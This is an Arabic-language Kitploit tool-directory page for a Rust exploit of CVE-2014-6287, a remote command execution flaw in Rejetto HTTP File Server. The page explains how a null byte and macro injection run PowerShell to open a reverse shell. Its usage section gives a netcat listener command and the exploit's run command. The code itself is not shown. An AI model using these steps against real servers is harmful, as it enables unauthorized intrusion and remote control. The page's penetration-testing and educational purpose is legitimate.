Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-6287 — تنفيذ بلغة Rust لاستغلال CVE-2014-6287 الذي يستهدف خادم ملفات Rejetto HTTP File Server (HFS) الإصدارات 2.3x قبل 2.3c. | Kitploit
أدوات/GitHubGitHub/nika0x38/cve-2014-6287
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

تنفيذ بلغة Rust لاستغلال CVE-2014-6287 الذي يستهدف خادم ملفات Rejetto HTTP File Server (HFS) الإصدارات 2.3x قبل 2.3c.

عرض المستودع
1منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2014-6287 - استغلال تنفيذ الأوامر عن بُعد في خادم ملفات Rejetto HTTP

Rust Security

تنفيذ بلغة Rust لاستغلال CVE-2014-6287 الذي يستهدف خادم ملفات Rejetto HTTP (HFS) الإصدارات 2.3x قبل الإصدار 2.3c.

نظرة عامة على الثغرة

CVE-2014-6287 هي ثغرة حرجة لتنفيذ الأوامر عن بُعد في خادم ملفات Rejetto HTTP (HFS).

التفاصيل التقنية

  • البرنامج المتأثر: خادم ملفات Rejetto HTTP (HFS) 2.3x قبل الإصدار 2.3c
  • نوع الثغرة: تنفيذ الأوامر عن بُعد (RCE)
  • درجة CVSS: 10.0 (حرجة)
  • CWE: CWE-94 (التحكم غير السليم في توليد الكود)

الوصف

تسمح الدالة findMacroMarker في parserLib.pas في خادم ملفات Rejetto HTTP للمهاجمين عن بُعد بتنفيذ برامج عشوائية عبر تسلسل %00 في إجراء البحث. تمكّن هذه الثغرة المهاجمين من تجاوز التحقق من صحة المدخلات وحقن كود خبيث يتم تنفيذه على النظام المستهدف.

يعمل الاستغلال عبر:

  1. صياغة استعلام بحث خبيث يحتوي على بايت فارغ (%00)
  2. حقن أوامر PowerShell داخل محددات الماكرو {. و .}
  3. يعالج الخادم الماكرو وينفذ كود PowerShell المضمّن
  4. إنشاء اتصال شل عكسي يعود إلى المهاجم

الاستخدام

الخطوة 1: إعداد مستمع Netcat

قبل تنفيذ الاستغلال، قم بإعداد مستمع على جهازك المهاجم لالتقاط الشل العكسي:

root@kitploit:~
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>

الخطوة 2: تنفيذ الاستغلال

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

المعاملات المطلوبة:

  • -l, --lhost <LHOST>: عنوان IP المحلي الخاص بك (جهاز المهاجم)
  • -p, --lport <LPORT>: المنفذ المحلي الخاص بك للشل العكسي
  • -r, --rhost <RHOST>: عنوان IP الهدف (خادم HFS المتأثر)

المعاملات الاختيارية:

  • -t, --rport <RPORT>: المنفذ الهدف (الافتراضي: 80)

إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدمها بمسؤولية وفقط على الأنظمة التي تملكها أو لديك إذن صريح

تنزيل الأداة